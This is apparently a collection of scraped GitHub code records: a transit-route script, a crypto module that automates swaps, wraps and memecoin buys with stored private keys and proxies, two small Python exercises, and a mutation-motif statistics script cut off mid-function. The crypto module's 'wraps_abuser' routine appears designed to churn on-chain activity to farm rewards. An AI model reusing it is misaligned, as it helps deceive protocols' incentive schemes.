are traveling from station \" + estacionNombreOrigen + \" to station \" + estacionNombreDestino)\n print(\"\\033[6;34m\" + \"*** Starting trip...\")\n objetoJSON.cargarListaEstaciones(troncalLetraOrigen, troncalLetraDestino, tuplaViaje)\n\n\n objetoUPZ = manejarJSON_UPZ()\n tabla_Hash = objetoUPZ.leerUPZ()\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n UPZElegida = int(input(\"\\033[1;33m\" + \"Enter the UPZ number: \"))\n print(\"\\033[1;33m\" + \"-------------------------------------------------------------\")\n objetoUPZ.buscarUPZ(UPZElegida, tabla_Hash)\n objetoJSON.leerTroncales()\nmain()","repo_name":"jducuara42/estructurasDeDatos","sub_path":"Proyecto2/principal.py","file_name":"principal.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"35046408025","text":"import random\n\nfrom config import ETH_PRICE, TOKENS_PER_CHAIN, LAYERZERO_WRAPED_NETWORKS, LAYERZERO_NETWORKS_DATA, \\\n TOKENS_PER_CHAIN2\nfrom modules import Logger, Aggregator\nfrom settings import GLOBAL_NETWORK, OKX_BALANCE_WANTED, AMOUNT_PERCENT, STARGATE_CHAINS, STARGATE_TOKENS, \\\n MEMCOIN_AMOUNT\nfrom utils.tools import helper, gas_checker\n\n\nclass Custom(Logger, Aggregator):\n def __init__(self, client):\n Logger.__init__(self)\n Aggregator.__init__(self, client)\n\n async def swap(self):\n pass\n\n async def collect_eth_util(self):\n from functions import swap_odos, swap_oneinch, swap_openocean, swap_xyfinance, swap_rango, swap_avnu\n\n self.logger_msg(*self.client.acc_info, msg=f\"Stark collecting tokens to ETH\")\n\n func = {\n 3: [swap_odos, swap_oneinch, swap_openocean, swap_xyfinance],\n 4: [swap_rango, swap_openocean, swap_xyfinance],\n 8: [swap_openocean, swap_xyfinance],\n 9: [swap_avnu],\n 11: [swap_openocean, swap_xyfinance, swap_odos, swap_oneinch]\n }[GLOBAL_NETWORK]\n\n wallet_balance = {k: await self.client.get_token_balance(k, False)\n for k, v in TOKENS_PER_CHAIN[self.client.network.name].items()}\n valid_wallet_balance = {k: v[1] for k, v in wallet_balance.items() if v[0] != 0}\n eth_price = ETH_PRICE\n\n if 'ETH' in valid_wallet_balance:\n valid_wallet_balance['ETH'] = valid_wallet_balance['ETH'] * eth_price\n\n if len(valid_wallet_balance.values()) > 1:\n\n for token_name, token_balance in valid_wallet_balance.items():\n if token_name != 'ETH':\n amount_in_wei = wallet_balance[token_name][0]\n amount = float(f\"{(amount_in_wei / 10 ** await self.client.get_decimals(token_name)):.6f}\")\n amount_in_usd = valid_wallet_balance[token_name]\n if amount_in_usd > 1:\n from_token_name, to_token_name = token_name, 'ETH'\n data = from_token_name, to_token_name, amount, amount_in_wei\n counter = 0\n while True:\n result = False\n module_func = random.choice(func)\n try:\n self.logger_msg(*self.client.acc_info, msg=f'Launching swap module', type_msg='warning')\n result = await module_func(self.client.account_name, self.client.private_key,\n self.client.network, self.client.proxy_init, swapdata=data)\n except Exception:\n pass\n counter += 1\n if result or counter == 3:\n break\n else:\n self.logger_msg(*self.client.acc_info, msg=f\"{token_name} balance < $1\")\n\n return True\n else:\n raise RuntimeError('Account balance already in ETH!')\n\n @helper\n @gas_checker\n async def collect_eth(self):\n await self.collect_eth_util()\n
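# Illustrative sketch (hypothetical helper, not part of the module): the
# retry-over-random-aggregators pattern used in collect_eth_util above can be
# factored out with an explicit attempt bound:
#
#   async def try_swap_with_fallback(modules, *args, attempts=3, **kwargs):
#       for _ in range(attempts):
#           module = random.choice(modules)
#           try:
#               if await module(*args, **kwargs):
#                   return True
#           except Exception:
#               continue
#       return False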
\n @helper\n @gas_checker\n async def balance_average(self):\n from functions import okx_withdraw\n\n self.logger_msg(*self.client.acc_info, msg=\"Stark: checking all balances to average them\")\n\n amount = OKX_BALANCE_WANTED\n wanted_amount_in_usd = float(f'{amount * ETH_PRICE:.2f}')\n\n wallet_balance = {k: await self.client.get_token_balance(k, False)\n for k, v in TOKENS_PER_CHAIN[self.client.network.name].items()}\n valid_wallet_balance = {k: v[1] for k, v in wallet_balance.items() if v[0] != 0}\n eth_price = ETH_PRICE\n\n if 'ETH' in valid_wallet_balance:\n valid_wallet_balance['ETH'] = valid_wallet_balance['ETH'] * eth_price\n\n valid_wallet_balance = {k: round(v, 7) for k, v in valid_wallet_balance.items()}\n\n sum_balance_in_usd = sum(valid_wallet_balance.values())\n\n if wanted_amount_in_usd > sum_balance_in_usd:\n need_to_withdraw = float(f\"{(wanted_amount_in_usd - sum_balance_in_usd) / eth_price:.6f}\")\n\n self.logger_msg(*self.client.acc_info, msg=f\"Not enough balance on account, start OKX withdraw module\")\n\n return await okx_withdraw(self.client.account_name, self.client.private_key, self.client.network,\n self.client.proxy_init, want_balance=need_to_withdraw)\n raise RuntimeError('Account has enough tokens on balance!')\n\n @helper\n @gas_checker\n async def wraps_abuser(self):\n from functions import swap_odos, swap_oneinch, swap_xyfinance, swap_avnu\n\n func = {\n 3: [swap_odos, swap_oneinch, swap_xyfinance],\n 4: [swap_xyfinance],\n 8: [swap_xyfinance],\n 9: [swap_avnu],\n 11: [swap_odos, swap_oneinch, swap_xyfinance]\n }[GLOBAL_NETWORK]\n\n current_tokens = list(TOKENS_PER_CHAIN[self.client.network.name].items())[:2]\n\n wallet_balance = {k: await self.client.get_token_balance(k, False) for k, v in current_tokens}\n valid_wallet_balance = {k: v[1] for k, v in wallet_balance.items() if v[0] != 0}\n eth_price = ETH_PRICE\n\n if 'ETH' in valid_wallet_balance:\n valid_wallet_balance['ETH'] = valid_wallet_balance['ETH'] * eth_price\n\n if 'WETH' in valid_wallet_balance:\n valid_wallet_balance['WETH'] = valid_wallet_balance['WETH'] * eth_price\n\n max_token = max(valid_wallet_balance, key=lambda x: valid_wallet_balance[x])\n percent = round(random.uniform(*AMOUNT_PERCENT), 9) / 100 if max_token == 'ETH' else 1\n amount_in_wei = int(wallet_balance[max_token][0] * percent)\n amount = float(f\"{amount_in_wei / 10 ** 18:.6f}\")\n\n if max_token == 'ETH':\n msg = f'Wrap {amount:.6f} ETH'\n from_token_name, to_token_name = 'ETH', 'WETH'\n else:\n msg = f'Unwrap {amount:.6f} WETH'\n from_token_name, to_token_name = 'WETH', 'ETH'\n\n self.logger_msg(*self.client.acc_info, msg=msg)\n\n if (max_token == 'ETH' and valid_wallet_balance[max_token] > 1\n or max_token == 'WETH' and valid_wallet_balance[max_token] != 0):\n data = from_token_name, to_token_name, amount, amount_in_wei\n counter = 0\n result = False\n while True:\n module_func = random.choice(func)\n try:\n result = await module_func(self.client.account_name, self.client.private_key,\n self.client.network, self.client.proxy_init, swapdata=data)\n\n except Exception:\n pass\n counter += 1\n if result or counter == 3:\n break\n\n return result\n else:\n self.logger_msg(*self.client.acc_info, msg=f\"{from_token_name} balance is too low (below $1)\")\n\n async def smart_swap_stargate(self):\n from functions import swap_stargate\n\n chain1, chain2 = STARGATE_CHAINS\n token1, token2 = STARGATE_TOKENS\n rpc_by_id = LAYERZERO_WRAPED_NETWORKS\n\n client_chain1 = await self.client.new_client(rpc_by_id[chain1])\n client_chain2 = await self.client.new_client(rpc_by_id[chain2])\n\n balance_chain1, _, _ = await client_chain1.get_token_balance(omnicheck=True, 
token_name=token1,\n check_symbol=False)\n balance_chain2, _, _ = await client_chain2.get_token_balance(omnicheck=True, token_name=token2,\n check_symbol=False)\n\n if balance_chain2 == 0 and balance_chain1 == 0:\n raise RuntimeError('Insufficient balances on both networks!')\n elif balance_chain2 > balance_chain1:\n current_client = client_chain2\n from_token_name, to_token_name = token2, token1\n amount_in_wei = balance_chain2 if from_token_name != 'ETH' else await client_chain2.client.get_smart_amount()\n src_chain_name, dst_chain_name = client_chain2.network.name, client_chain1.network.name\n dst_chain_id = LAYERZERO_NETWORKS_DATA[chain1][1]\n contract = client_chain2.get_contract(TOKENS_PER_CHAIN2[client_chain2.network.name][from_token_name])\n decimals = await contract.functions.decimals().call()\n else:\n current_client = client_chain1\n from_token_name, to_token_name = token1, token2\n amount_in_wei = balance_chain1 if from_token_name != 'ETH' else await client_chain1.client.get_smart_amount()\n src_chain_name, dst_chain_name = client_chain1.network.name, client_chain2.network.name\n dst_chain_id = LAYERZERO_NETWORKS_DATA[chain2][1]\n contract = client_chain1.get_contract(TOKENS_PER_CHAIN2[client_chain1.network.name][from_token_name])\n decimals = await contract.functions.decimals().call()\n\n amount = f\"{amount_in_wei / 10 ** decimals:.3f}\"\n\n swapdata = dst_chain_id, dst_chain_name, src_chain_name, from_token_name, to_token_name, amount, amount_in_wei\n\n return await swap_stargate(current_client, swapdata=swapdata)\n\n @helper\n async def mint_token_avnu(self):\n from functions import swap_avnu\n\n amount, amount_in_wei = MEMCOIN_AMOUNT, int(MEMCOIN_AMOUNT * 10 ** 18)\n data = 'ETH', 'MEMCOIN', amount, amount_in_wei\n\n return await swap_avnu(self.client.account_name, self.client.private_key,\n self.client.network, self.client.proxy_init, swapdata=data)\n\n @helper\n async def mint_token_jediswap(self):\n from functions import swap_jediswap\n\n amount, amount_in_wei = MEMCOIN_AMOUNT, int(MEMCOIN_AMOUNT * 10 ** 18)\n data = 'ETH', 'MEMCOIN', amount, amount_in_wei\n\n return await swap_jediswap(self.client.account_name, self.client.private_key,\n self.client.network, self.client.proxy_init, swapdata=data)\n\n","repo_name":"realaskaer/AttackMachine","sub_path":"modules/others/cutsom_module.py","file_name":"cutsom_module.py","file_ext":"py","file_size_in_byte":10203,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"51"} +{"seq_id":"4255527395","text":"# Create a dictionary for each person\npersona1 = {\"nombre\": \"Juan\", \"apellido\": \"Pérez\", \"telefono\": \"90909090\"}\npersona2 = {\"nombre\": \"María\", \"apellido\": \"González\", \"telefono\": \"80808080\"}\npersona3 = {\"nombre\": \"Pedro\", \"apellido\": \"Rodríguez\", \"telefono\": \"70707070\"}\n\n# Create a list to store the dictionaries\nlista_personas = [persona1, persona2, persona3]\n\n# Print the list of people\nprint(lista_personas)\n\n","repo_name":"waldaldo/Python","sub_path":"4.- S4/DRILLING/drilling.py","file_name":"drilling.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"10702080108","text":"arr = [1,2,3,4,5]\ngive_one = [1,2,3,4,5]\n\ngive_two = [2, 1, 2, 3, 2, 4, 2, 5]\n\ngive_three = [3, 3, 1, 1, 2, 2, 4, 4, 5, 5]\n\nanswer_count = [0,0,0]\nanswer_result = []\n
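# Worked illustration (toy data, standalone) of the scoring rule used below: each
# student's fixed guess pattern is tiled over the answer key via i % len(pattern).
demo_answers = [1, 3, 2, 4, 2]
demo_pattern = [1, 2]                      # tiles to [1, 2, 1, 2, 1]
demo_score = sum(1 for i, a in enumerate(demo_answers)
                 if a == demo_pattern[i % len(demo_pattern)])
# demo_score == 1 (only index 0 matches)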
for i,value in enumerate(arr):\n\n if value == give_one[i%len(give_one)]:\n answer_count[0] += 1\n if value == give_two[i%len(give_two)]:\n answer_count[1] += 1\n if value == give_three[i%len(give_three)]:\n answer_count[2] += 1\n\nfor index,k in enumerate(answer_count):\n if k == max(answer_count):\n answer_result.append(index+1)\nprint(answer_result)\n# if one_count>=1 and two_count>=1 and three_count>=1:\n# if (one_count == two_count == three_count):\n# print([1,2,3])\n# elif(two_count == three_count):\n# print([2, 3])\n# elif(one_count == two_count):\n# print([1, 2])\n# elif(one_count == three_count):\n# print([1,3])\n# else:\n# result_arr =[]\n# if max(one_count,two_count,three_count) == one_count:\n# print([1])\n# elif max(one_count,two_count,three_count) == two_count:\n# print([2])\n# elif max(one_count,two_count,three_count) == three_count:\n# print([3])","repo_name":"hyunseungbin9408/Python","sub_path":"algorithm/Level_1/mock_test.py","file_name":"mock_test.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"41477248504","text":"#!/usr/bin/env python\n\n# DESCRIPTION\n# Checks for evidence of mutations at a given motif, as well as a designated position in the motif\n#\n# After obtaining the sequences for each region of interest, all 4 possible orientations of the input\n# motif are generated. The locations of the motif in each region are then identified.\n# The number of mutations overlapping the motif is then calculated, as well as the number of mutations\n# overlapping the position of interest.\n# The probability of mutation enrichment/depletion is then calculated using a Fisher's exact test:\n#\n# Probability of mutation enrichment/depletion for the motif:\n# Number of mutations overlapping motif, Total lengths of motifs\n# Number of mutations in gene, Gene length\n#\n# Probability of mutation enrichment/depletion for the position in the motif:\n# Number of mutations overlapping position in motif, Total number of positions across all motifs\n# Number of mutations overlapping position gene-wide, Total number of positions across region\n#\n# AUTHOR\n# Christopher Rushton\n#\n\nimport argparse\nimport os\nimport pyfaidx\nimport sys\nimport re\nfrom scipy.stats import binom_test, fisher_exact\n\ndef isValidFile(file, parser):\n\t\"\"\"\n\tEnsures that the specified file-path actually exists\n\t\"\"\"\n\tif not os.path.exists(file):\n\t\traise parser.error(\"Unable to locate \\\"%s\\\": No such file or directory\" % file)\n\telse:\n\t\treturn file\n\n\ndef getArgs():\n\t\"\"\"\n\tProcesses command line arguments\n\t\"\"\"\n\tparser = argparse.ArgumentParser(description=\"Checks for enrichment of mutations at a given motif/site in a motif\")\n\n\tparser.add_argument(\"-m\", \"--maf_file\", metavar=\"MAF\", required=True, type=lambda x: isValidFile(x, parser),\n\t\t\t\t\t\thelp=\"Input MAF file, listing mutations in the regions of interest\")\n\tparser.add_argument(\"-r\", \"-f\", \"--reference\", metavar=\"FASTA\", required=True, type=lambda x: isValidFile(x, parser),\n\t\t\t\t\t\thelp=\"Reference genome, in FASTA format\")\n\tparser.add_argument(\"-t\", \"--targets\", metavar=\"BED\", required=True, type=lambda x: isValidFile(x, parser),\n\t\t\t\t\t\thelp=\"A BED3 file (or better) listing the regions of interest\")\n\tparser.add_argument(\"-s\", \"--signature\", metavar=\"AATYG\", required=True, help=\"Mutation signature sequence\")\n\tparser.add_argument(\"-i\", \"--index\", metavar=\"1\", required=True, type=int, help=\"1-based index of the 
position of interest in the mutation signature\")\n\tparser.add_argument(\"-o\", \"--output\", metavar=\"TSV\", required=False, default=sys.stdout, help=\"Output file to write summary report. [default: stdout]\")\n\tparser.add_argument(\"--method\", metavar=\"STATS\", choices=[\"fisher_exact\", \"binomial_exact\"], default=\"binomial_exact\",\n\t\t\t\t\t\thelp=\"Method to use to test for increased/decreased frequency of mutations [default: %(default)s]\")\n\tparser.add_argument(\"--annotate_maf\", metavar=\"MAF\", required=False, help=\"Output MAF file listing all mutations, and if they overlap the signature or site of interest\")\n\targs = parser.parse_args()\n\n\t# Sanity checks\n\tif args.index <= 0 or args.index > len(args.signature):\n\t\tparser.error(\"\\'-i/--index\\' must be a 1-based index corresponding to the position in the \\'-s/--signature\\' of interest\")\n\n\treturn args\n\n\ndef loadGeneSequences(targetFile, refFile):\n\t\"\"\"\n\tObtain the DNA sequences of each region provided\n\n\t:args targetFile: A BED3 file (or better) listing the regions of interest\n\t:args refFile: A file-path to a FASTA file corresponding to the reference genome\n\t\"\"\"\n\n\t# Load targets\n\ttargetSeq = {}\n\tgeneNames = {}\n\n\t# Load the reference genome\n\trefGenome = pyfaidx.Fasta(refFile)\n\n\twith open(targetFile) as f:\n\t\t\tfor line in f:\n\t\t\t\tline = line.rstrip()\n\t\t\t\t# Obtain genomic coordinates\n\t\t\t\ttry:\n\t\t\t\t\tcols = line.split(\"\\t\")\n\t\t\t\t\tchrom, start, end = cols[0:3]\n\n\t\t\t\t\t# Generate a unique ID which will be used to identify this sequence\n\t\t\t\t\tidName = chrom + \":\" + start + \"-\" + end\n\n\t\t\t\t\tstart = int(start) # Account for 1-based indexing\n\t\t\t\t\tend = int(end)\n\n\t\t\t\texcept (IndexError, ValueError): # This record is malformed or missing. Don't process it\n\t\t\t\t\tsys.stderr.write(\"WARNING: BED entry \\'\" + line + \"\\' appears malformed. Ignoring...\\n\")\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Parse the gene name (if present)\n\t\t\t\ttry:\n\t\t\t\t\tgeneName = cols[3]\n\t\t\t\texcept IndexError:\n\t\t\t\t\t# Use the position as a replacement ID\n\t\t\t\t\tgeneName = idName\n\n\t\t\t\t# Obtain the DNA sequence for this gene\n\t\t\t\tgeneSeq = refGenome[chrom][start:end].seq\n\n\t\t\t\t# Sanity check: If this region already exists (i.e. it was specified in the BED file multiple times)\n\t\t\t\t# inform the user\n\t\t\t\tif idName in targetSeq:\n\t\t\t\t\tsys.stderr.write(\"WARNING: BED entry \\'\" + line + \"\\' appears to be a duplicate. Ignoring...\\n\")\n\t\t\t\telse:\n\t\t\t\t\tgeneNames[idName] = geneName\n\t\t\t\t\ttargetSeq[idName] = geneSeq\n\n\treturn targetSeq, geneNames\n\n\ndef loadMutations(mafFile):\n\t\"\"\"\n\tStores the position of mutations from an input file in a dictionary\n\n\t:param mafFile: A string containing a file-path to the input file\n\t:return: A dictionary storing chrom: [mutation1, mutation2] (sorted)\n\t\"\"\"\n\n\tmutations = {}\n\tsamples = set()\n\twith open(mafFile) as f:\n\t\tfor line in f:\n\t\t\t# Skip header lines\n\t\t\tif line.startswith(\"#\") or line.startswith(\"Hugo_Symbol\"):\n\t\t\t\tcontinue\n\n\t\t\t# Parse the chromosome and position of each mutation\n\t\t\ttry:\n\t\t\t\tcols = line.split(\"\\t\")\n\t\t\t\tchrom = cols[4]\n\t\t\t\tposition = int(cols[5]) - 1\n\t\t\t\tsample = cols[15]\n\t\t\texcept (IndexError, TypeError):\n\t\t\t\traise TypeError(\"Unable to parse input MAF file. 
It may be malformed.\")\n\t\t\tif chrom not in mutations:\n\t\t\t\tmutations[chrom] = []\n\t\t\tmutations[chrom].append(position)\n\n\t\t\t# Add the sample\n\t\t\tif sample not in samples:\n\t\t\t\tsamples.add(sample)\n\n\tfor chrom, positions in mutations.items():\n\t\tmutations[chrom] = sorted(positions)\n\n\treturn mutations, len(samples)\n\n\ndef compareMutRate(targetSeq, geneNames, signatures, siteRegex, baseIndexes, mutations, sampleNum, outFile, method):\n\t\"\"\"\n\t:param targetSeq: A dictionary containing geneID: DNA_Sequence\n\t:param geneNames: A dictionary storing geneID: GeneName (ex. chr1:100-1000 : ID3)\n\t:param signatures: An iterable containing all possible orientations of the mutation signatures\n\t:param siteRegex: A string representing a regular expression which represents the position of interest in the motif\n\t:param baseIndexes: An iterable listing indexes for a particular base in signatures\n\t:param mutations: A dictionary listing chromosome: [position1, position2, position3] for all mutations in the input file\n\t:param sampleNum: An int listing the number of samples in the input\n\t:param outFile: A string containing a file-path to an output file, or sys.stdout\n\t:param method: The method used to calculate the mutation bias (ex. fishers_exact)\n\t\"\"\"\n\n\t# Compile the motif signatures\n\tcompiledSig = tuple(re.compile(x) for x in signatures)\n\n\t# Store mutation which overlap the motif and site of interest\n\ttotalMotifMut = {}\n\ttotalSiteMut = {}\n\n\twith open(outFile, \"w\") if isinstance(outFile, str) else sys.stdout as o:\n\t\t# Write the file header\n\t\theader = \"\\t\".join([\"gene\", \"motif_bases\", \"gene_bases\", \"gene_mutations\", \"expected_motif_mut\",\n\t\t\t\t\t\t\t\"actual_motif_mut\", \"motif_bias\", \"motif_odds_ratio\", \"motif_site_bases\", \"gene_site_bases\",\n\t\t\t\t\t\t\t\"expected_motif_site_mut\", \"actual_motif_site_mut\", \"motif_site_bias\", \"motif_site_odds_ratio\"])\n\t\tprint(header, file=o)\n\t\tfor gene, geneSeq in targetSeq.items():\n\n\t\t\tregionLength = len(geneSeq)\n\t\t\tchrom, pos = gene.split(\":\")\n\t\t\tgeneStart, geneEnd = pos.split(\"-\")\n\t\t\tgeneStart = int(geneStart)\n\t\t\tgeneEnd = int(geneEnd)\n\t\t\t# First thing we need to is to determine how many times the specified signature occurs\n\t\t\t# in each gene\n\t\t\tsigLoc = {} # Will store the index of a given match, and the index of the base of interest for that hit\n\n\t\t\t# Find all matches (in all orientations) for this mutation signature in this gene\n\t\t\tfor sig, posIndex in zip(compiledSig, baseIndexes):\n\n\t\t\t\t# Find all instances of this motif\n\t\t\t\tpos = 0\n\n\t\t\t\t# This implementation is required to find overlapping motifs\n\t\t\t\twhile True:\n\t\t\t\t\thit = sig.search(geneSeq, pos)\n\t\t\t\t\tif hit is None: # No more instances of this motif exist in the gene sequence\n\t\t\t\t\t\tbreak\n\t\t\t\t\tx = hit.start()\n\t\t\t\t\tif x not in sigLoc:\n\t\t\t\t\t\tsigLoc[x] = []\n\t\t\t\t\tsigLoc[x].append((hit, hit.start() + posIndex))\n\t\t\t\t\tpos = x + 1\n\n\t\t\t# Calculate the number of bases which overlap the motif\n\t\t\t# Also identify which mutations overlap the signatures\n\t\t\tmotifBases = 0\n\t\t\tresidueBases = 0 # How many bases overlap this residue?\n\t\t\tmotifMut = 0\n\t\t\tnonMotifMut = 0\n\t\t\tresidueMut = 0\n\t\t\tnonResidueMut = 0\n\n\t\t\tif chrom not in totalMotifMut:\n\t\t\t\ttotalMotifMut[chrom] = []\n\t\t\t\ttotalSiteMut[chrom] = []\n\n\t\t\t# What mutation overlap this gene\n\t\t\tmutOnGene = 
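				# Note (standalone illustration): the manual `pos = hit.start() + 1` restart in the
				# while-loop above is needed because re.finditer only yields non-overlapping matches.
				# For example, with sig = re.compile("AA") and seq = "AAAA":
				#   [m.start() for m in sig.finditer(seq)]  ->  [0, 2]
				# while the search/pos loop used here finds the overlapping hits [0, 1, 2].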
list(x - geneStart for x in mutations.get(chrom, []) if geneStart <= x < geneEnd) # .get() avoids a KeyError for chromosomes with no mutations\n\t\t\tmutNum = len(mutOnGene)\n\t\t\tcurrentMut = 0\n\t\t\tpositions = sigLoc.keys()\n\t\t\tcurrentPos = 0\n\t\t\tcoveredResidues = set()\n\t\t\tfor key in sorted(positions):\n\t\t\t\thits = sorted(sigLoc[key], key=lambda x: x[0].end())\n\t\t\t\tfor hit in hits:\n\t\t\t\t\t# Add the UNIQUE bases which overlap this hit to the motif overlap count\n\t\t\t\t\tif hit[0].start() > currentPos:\n\t\t\t\t\t\tstart = hit[0].start()\n\t\t\t\t\telse:\n\t\t\t\t\t\tstart = currentPos\n\t\t\t\t\tcurrentPos = hit[0].end()\n\t\t\t\t\tmotifBases += hit[0].end() - start\n\n\t\t\t\t\t# Add the UNIQUE bases overlapping the residue of interest to that count\n\t\t\t\t\tif hit[1] not in coveredResidues:\n\t\t\t\t\t\tcoveredResidues.add(hit[1])\n\t\t\t\t\t\tresidueBases += 1\n\n\t\t\t\t\t# Find any mutations which overlap these bases\n\t\t\t\t\twhile currentMut < mutNum and mutOnGene[currentMut] < start:\n\t\t\t\t\t\tcurrentMut += 1\n\t\t\t\t\t\tnonMotifMut += 1\n\n\t\t\t\t\twhile currentMut < mutNum and mutOnGene[currentMut] < hit[0].end():\n\t\t\t\t\t\ttotalMotifMut[chrom].append(mutOnGene[currentMut] + geneStart)\n\t\t\t\t\t\tmotifMut += 1\n\t\t\t\t\t\tcurrentMut += 1\n\n\t\t\twhile currentMut < mutNum:\n\t\t\t\tnonMotifMut += 1\n\t\t\t\tcurrentMut += 1\n\n\t\t\t# Count up the number of mutations which overlap the residue of interest\n\t\t\tfor mut in mutOnGene:\n\t\t\t\tif mut in coveredResidues:\n\t\t\t\t\tresidueMut += 1\n\t\t\t\t\ttotalSiteMut[chrom].append(mut + geneStart)\n\t\t\t\telse:\n\t\t\t\t\tnonResidueMut += 1\n\n\t\t\tassert residueMut + nonResidueMut == mutNum\n\t\t\tassert motifMut + nonMotifMut == mutNum\n\n\t\t\tnumCoveredResidues = len(coveredResidues)\n\n\t\t\t# Calculate the number of positions across the entire gene which correspond to the position of interest\n\t\t\ttotalSiteBases = set(x.start() for x in re.finditer(siteRegex, geneSeq))\n\t\t\tnumTotalSiteBases = len(totalSiteBases)\n\n\t\t\t# Calculate the number of mutations which overlap the position of interest\n\t\t\tresidueGeneMut = list(x for x in mutOnGene if x in totalSiteBases)\n\t\t\tnumResidueGeneMut = len(residueGeneMut)\n\n\t\t\t# Calculate the number of site mutations expected to fall within motif-covered positions\n\t\t\texpectedSiteMut = round(float(numCoveredResidues) / float(numTotalSiteBases) * numResidueGeneMut)\n\t\t\t# Calculate the number of mutations expected to overlap the motif\n\t\t\texpectedMotifMut = round(mutNum * float(motifBases) / float(regionLength))\n\n\t\t\t# Calculate the p-values for each method\n\t\t\tif method == \"fisher_exact\":\n\t\t\t\tmotifPVal = fisher_exact([[motifMut, motifBases * sampleNum], [mutNum, regionLength * sampleNum]])[1]\n\t\t\t\tsitePVal = fisher_exact([[residueMut, numCoveredResidues * sampleNum], [numResidueGeneMut, numTotalSiteBases * sampleNum]])[1]\n\t\t\telif method == \"binomial_exact\":\n\t\t\t\t# Calculate the mutation rate per site across the entire region\n\t\t\t\texpMutRate = float(mutNum) / (float(regionLength) * sampleNum)\n\t\t\t\t# Run a binomial test to see if mutations are enriched in the motif\n\t\t\t\tmotifPVal = binom_test(motifMut, motifBases * sampleNum, expMutRate)\n\n\t\t\t\t# Calculate the mutation rate per position of interest across the entire region\n\t\t\t\texpPosMutRate = float(numResidueGeneMut) / (float(numTotalSiteBases) * sampleNum)\n\t\t\t\tsitePVal = binom_test(residueMut, numCoveredResidues * sampleNum, expPosMutRate)\n\n\t\t\t# Calculate the odds ratio for the motif and 
site\n\t\t\tif mutNum == 0 or motifBases == 0: # There are no mutations in the region of interest\n\t\t\t\tmotifOddsRatio = \"NA\"\n\t\t\telse:\n\t\t\t\tmotifOddsRatio = (motifMut / (motifBases * sampleNum - motifMut)) / (float(mutNum) / (regionLength * sampleNum - float(mutNum)))\n\t\t\tif numResidueGeneMut == 0 or numCoveredResidues == 0: # There are no residue mutations in the region\n\t\t\t\tsiteOddsRatio = \"NA\"\n\t\t\telse:\n\t\t\t\tsiteOddsRatio = (residueMut / (numCoveredResidues * sampleNum - residueMut)) / (float(numResidueGeneMut) / (numTotalSiteBases * sampleNum - float(numResidueGeneMut)))\n\n\t\t\t# Generate output\n\t\t\toutLine = \"\\t\".join([geneNames[gene], str(motifBases), str(regionLength), str(mutNum), str(expectedMotifMut),\n\t\t\t\t\t\t\t\tstr(motifMut), str(motifPVal), str(motifOddsRatio), str(numCoveredResidues), str(numTotalSiteBases), str(expectedSiteMut),\n\t\t\t\t\t\t\t\tstr(residueMut), str(sitePVal), str(siteOddsRatio)])\n\n\t\t\tprint(outLine, file=o)\n\n\t\treturn totalMotifMut, totalSiteMut\n\n\ndef complimentSignature(sequence, index):\n\t\"\"\"\n\tGenerate all orientations of the specified sequence\n\n\t:param sequence: A string consisting of IUPAC bases corresponding to the signature of interest\n\t:param index: An integer corresponding to a given position in the sequence (1-based)\n\t:return: A tuple of (signature regexes for all orientations, base indexes for each orientation, site regex)\n\t\"\"\"\n\n\tsignatures = []\n\tindexes = []\n\n\tcompliment = {\n\t\t'A': 'T',\n\t\t'T': 'A',\n\t\t'C': 'G',\n\t\t'G': 'C',\n\t\t'U': 'A',\n\t\t'R': 'Y',\n\t\t'Y': 'R',\n\t\t'S': 'S',\n\t\t'W': 'W',\n\t\t'K': 'M',\n\t\t'M': 'K',\n\t\t'B': 'V',\n\t\t'D': 'H',\n\t\t'H': 'D',\n\t\t'V': 'B',\n\t\t'N': 'N'\n\t}\n\n\tIUPACCodeDict = {\n\t\t'A': 'A', # Adenine\n\t\t'C': 'C', # Cytosine\n\t\t'G': 'G', # Guanine\n\t\t'T': 'T', # Thymine\n\t\t'R': '[AG]', # A or G\n\t\t'Y': '[CT]', # C or T\n\t\t'S': '[GC]', # G or C\n\t\t'W': '[AT]', # A or T\n\t\t'K': '[GT]', # G or T\n\t\t'M': '[AC]', # A or C\n\t\t'B': '[CGT]', # C or G or T\n\t\t'D': '[AGT]', # A or G or T\n\t\t'H': '[ACT]', # A or C or T\n\t\t'V': '[ACG]', # A or C or G\n\t\t'N': '[ACGT]', # any base\n\t}\n\n\t# Generate a reverse complement of this sequence\n\ttry:\n\t\tcomplimentSeq = \"\".join(list(compliment[x] for x in sequence))\n\texcept KeyError: # A non-IUPAC base is present in the sequence\n\t\t# Find the bad base by checking against the lookup table\n\t\t# (complimentSeq is undefined here, since the join above failed)\n\t\tfor char in sequence:\n\t\t\tif char not in compliment:\n\t\t\t\traise TypeError(\"Unrecognized IUPAC base: %s\" % char)\n\n\t\t# Something has gone horribly wrong!!!!\n\t\traise TypeError(\"Unrecognized IUPAC base in: %s\" % sequence)\n\n\t# Convert ambiguous IUPAC bases into regular expressions\n\n\t# First orientation: The input orientation\n\tforwardRegex = list(IUPACCodeDict[x] for x in sequence)\n\tsignatures.append(\"\".join(forwardRegex))\n\tindexes.append(index - 1)\n\n\t# Second orientation: Reverse\n\tsignatures.append(\"\".join(forwardRegex[::-1]))\n\tindexes.append(len(forwardRegex) - index)\n\n\t# Third orientation: Complement\n\treverseRegex = list(IUPACCodeDict[x] for x in complimentSeq)\n\tsignatures.append(\"\".join(reverseRegex))\n\tindexes.append(index - 1)\n\n\t# Fourth orientation: Reverse complement:\n\tsignatures.append(\"\".join(reverseRegex[::-1]))\n\tindexes.append(len(reverseRegex) - index)\n\n\t# Finally, generate a regular expression just for the position of interest\n\tsitePos = IUPACCodeDict[sequence[index - 1]] # Bases which correspond to the IUPAC symbol for the position of interest\n\tsitePos 
